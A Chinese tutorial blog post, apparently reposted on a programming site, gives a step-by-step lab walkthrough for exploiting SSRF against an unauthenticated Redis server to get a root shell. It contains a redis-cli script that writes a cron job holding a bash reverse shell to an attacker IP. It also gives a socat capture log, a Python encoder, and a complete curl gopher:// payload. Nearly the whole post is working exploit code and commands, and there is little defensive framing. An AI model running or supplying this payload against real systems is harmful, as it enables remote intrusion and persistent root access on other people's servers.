2. 程式人生 > 實用技巧 >SSRF漏洞利用之Redis大神賜予shell

SSRF漏洞利用之Redis大神賜予shell

阿新 發佈:2020-07-11

0x00實驗環境

1、centos靶機(IP為:192.168.11.205,橋接模式)

2、kali黑客攻擊主機(IP為:192.168.172.129,NAT模式)

0x01實驗原理

這段payload的作用我們先說明一下,其作用是在靶機的/var/spool/cron臨時目錄下,利用ssrf漏洞寫入黑客的redis資料庫的操作,這樣,黑客可以通過自己寫入的redis資料庫直接執行後獲取靶機的shell

0x02實驗步驟

(1)在centos靶機內部部署:

注意:這裡面的192.168.172.129/7999是我們kali的主機IP

echo -e "\n\n*/2 * * * * bash -i >& /dev/tcp/192.168.172.129/7999 0>&1\n\n"|/root/redis-2.8.3/src/redis-cli -h $1 -p $2 -x set 1


/root/redis-2.8.3/src/redis-cli -h $1 -p $2 config set dir /var/spool/cron/
/root/redis-2.8.3/src/redis-cli -h $1 -p $2 config set dbfilename root
/root/redis-2.8.3/src/redis-cli -h $1 -p $2 save
/root/redis-2.8.3/src/redis-cli -h $1 -p $2 quit

其中

$1表示含有redis漏洞的主機IP(centos)

$2表示redis的開啟的埠或者被轉發之後的埠

將上述程式碼儲存為bash.sh(注意修改redis的路徑及IP

(2)使用socat進行埠轉發(注:如果沒有安裝socat的,請使用如下的命令列進行安裝)

yum install socat

(3)使用socat進行redis的埠轉發,這裡需要保證你的centos的redis埠是開啟的

(4)將產生的命令行復製出來,並使用python指令碼進行過濾各種尖括號等的操作,這是為了讓機器更好的識別,並儲存為log.txt

過濾方法

  • 如果第一個字元是>或者<那麼丟棄該行字串,表示請求和返回的時間。

  • 如果前3個字元是+OK 那麼丟棄該行字串,表示返回的字串。

  • \r字串替換成%0d%0a

  • 空白行替換為%0a

2019/05/17 12:05:20.576789 length=89 from=0 to=88
*3\r
$3\r
set\r
$1\r
1\r
$62\r


*/2 * * * * bash -i >& /dev/tcp/192.168.172.129/7999 0>&1


\r
< 2019/05/17 12:05:20.577165 length=5 from=0 to=4
+OK\r
> 2019/05/17 12:05:20.581392 length=57 from=0 to=56
*4\r
$6\r
config\r
$3\r
set\r
$3\r
dir\r
$16\r
/var/spool/cron/\r
< 2019/05/17 12:05:20.581966 length=5 from=0 to=4
+OK\r
> 2019/05/17 12:05:20.587385 length=52 from=0 to=51
*4\r
$6\r
config\r
$3\r
set\r
$10\r
dbfilename\r
$4\r
root\r
< 2019/05/17 12:05:20.587804 length=5 from=0 to=4
+OK\r
> 2019/05/17 12:05:20.591422 length=14 from=0 to=13
*1\r
$4\r
save\r
< 2019/05/17 12:05:20.593302 length=5 from=0 to=4
+OK\r
> 2019/05/17 12:05:20.597224 length=14 from=0 to=13
*1\r
$4\r
quit\r
< 2019/05/17 12:05:20.597551 length=5 from=0 to=4
+OK\r

python指令碼為(建議使用python2的環境):

#coding: utf-8
import sys

exp = ''

with open(sys.argv[1]) as f:
    for line in f.readlines():
        if line[0] in '><+':
            continue
        # 判斷倒數第2、3字串是否為\r
        elif line[-3:-1] == r'\r':
            # 如果該行只有\r,將\r替換成%0a%0d%0a
            if len(line) == 3:
                exp = exp + '%0a%0d%0a'
            else:
                line = line.replace(r'\r', '%0d%0a')
                # 去掉最後的換行符
                line = line.replace('\n', '')
                exp = exp + line
        # 判斷是否是空行,空行替換為%0a
        elif line == '\x0a':
            exp = exp + '%0a'
        else:
            line = line.replace('\n', '')
            exp = exp + line
print exp

得到如下結果:

88*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$62%0d%0a%0a%0a*/2 * * * * bash -i >& /dev/tcp/192.168.172.129/7999 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

(5)使用CURL構造完整的請求

curl -v 'gopher://192.168.11.205:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$62%0d%0a%0a%0a*/2 * * * * bash -i >& /dev/tcp/192.168.172.129/7999 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a'

待續。。。。。

相關推薦

SSRF漏洞利用Redis賜予shell

0x00實驗環境 1、centos靶機(IP為:192.168.11.205,橋接模式) 2、kali黑客攻擊主機(IP為:192.168.172.129,NAT模式)

騰訊強推Redis路成長手冊!原理+應用+叢集+拓展+原始碼五篇齊飛

Redis 是網際網路技術架構在儲存系統中使用得為廣泛的中介軟體,也是中高階後端工程師技術面試中面試官喜歡問的工程技能之一,特別是那些優秀的網際網路公司,通常要求面試者不僅僅掌握 Redis 基礎用法,還要理解

SSRF漏洞利用

一、判斷漏洞是否存在 1.基本判斷(排除法) 如:http://www.douban.com/***/service?image=http://www.baidu.com/img/bd_logo1.png

49:WAF繞過-漏洞利用注入上傳跨站等繞過

思維導圖 1、SQL注入 如需sqlmap注入測試, 防cc攔截:修改user-agent頭+代理(付費代理池)

java程式設計師如何進階?掌握這些技術問題你就已經步入路了

一、資料結構與演算法基礎 說一下幾種常見的排序演算法和分別的複雜度。 用Java寫一個氣泡排序演算法

你練的哪門子功夫?redis武林大會江湖賞(一)

前序 古言相傳:有分散式的地方,就有redisredis問世以來,便以其快捷的速度、多樣的資料結構和優良的效能,在key-value資料庫爭霸中攻城拔寨,深受眾多綠林好猿的喜愛。而程式碼界的武林大會也因redis年年的精彩表

SSRF漏洞(原理、挖掘點、漏洞利用、修復建議)

1.介紹SSRF漏洞 SSRF (Server-Side Request Forgery,伺服器端請求偽造)是一種由攻擊者構造請求,由服務端發起請求的安全漏洞。一般情況下,SSRF攻擊的目標是外網無法訪問的內部系統(正因為請求是由服務端發起的,所以

redis未授權訪問漏洞利用總結——linux篇

1、前言:   redis未授權漏洞或弱口令一直是很有用的滲透突破口,最近遇到了redis相關的目標,因此做一個簡單的收集,也方便自己日後的回顧。

教你利用指標間接賦值

我們都知道,指標是指向一段記憶體空間的。而這個記憶體空間也可以存放下一個記憶體空間的地址,這樣一級級的傳遞下去,就變成了多級指標。在C語言中,多級指標是經常會用到的。

python實現vlookup功能(程式碼存在很漏洞們予以指點,感激不盡)

技術標籤:python實現vlookup功能python經驗分享 在這裡插入程式碼片@TOC import xlwings as xw #工作簿1 path1 = r’C:\\Users\\Administrator\\Desktop\\主表.xlsx’ app1 = xw.App() books1 = app1.books.ope

nginx路必備nginx_proxy模組

proxy_set_header ##設定由後端的伺服器獲取使用者的主機名或者真實IP地址,以及代理者的真實IP地址。client_body_buffer_size ##用於指定客戶端請求主題緩衝區大小,可以理解為先儲存到本地再傳給使用者proxy_conne

《永劫無間》振刀教學 路第一期

這是裡《永劫無間》攻略組,你是否想從一通亂砍的左鍵狂魔提升到另一個更強的水平?在遇到真人PK時不會光速白給。那麼歡迎關注我們永劫無間攻略組,輕鬆學習進階攻略,開啟路。

《永劫無間》身法教學 路第二期

上一期我們說到了怎麼在永劫無間中振刀和反振刀,這一期我們將講解戰鬥章節的下半部分身法的操作。

Redis漏洞利用

一、Redis介紹 Redis是一個開源的高效能鍵值資料庫。最熱門的NoSq資料庫之一,也被人們稱為資料結構伺服器。

Redis路電子版教程已問世,Java面試題庫及答案

一、位元組跳動技術一面(演算法) Java 的 16 進位制與字串的相互轉換函式 JAVA 時間格式化處理

適合小白的Java零基礎自學方法,從零基礎到

零基礎如何學Java?自學Java能成功嗎? 今天主要說一說自學Java的那些事兒 先來了解下Java

SSRF漏洞利用協議學習(PHP支援的協議和封裝協議)

支援的協議和封裝協議 https://www.php.net/manual/zh/wrappers.php PHP 帶有很多內建 URL 風格的封裝協議,可用於類似 fopen()、 copy()、 file_exists() 和 filesize() 的檔案系統函式。 除了這些封裝協議,還能

Java小白逆襲路,零基礎也能變

首先我要給你說的是,任何一個東西從零到精通,都是需要一個過程的,就相當於我們在小學的時候學乘法口訣表,背文言文一樣,都是需要我們慢慢的去渡過這個階段,我們才能慢慢的掌握,其次,畢竟這是一門程式語言,你

Vulhub 漏洞學習Redis

Vulhub 漏洞學習Redis 1 Redis簡介 Redis 是完全開源的,遵守 BSD 協議,是一個高效能的 key-value 資料庫。Redis 與其他 key - value 快取產品有以下三個特點:

SpringBoot系列教程Redis叢集環境配置

之前介紹的幾篇redis的博文都是基於單機的redis基礎上進行演示說明的,然而在實際的生產環境中,使用redis叢集的可能性應該是大於單機版的redis的,那麼叢集的redis如何操作呢?它的配置和單機的有什麼區別,又有什麼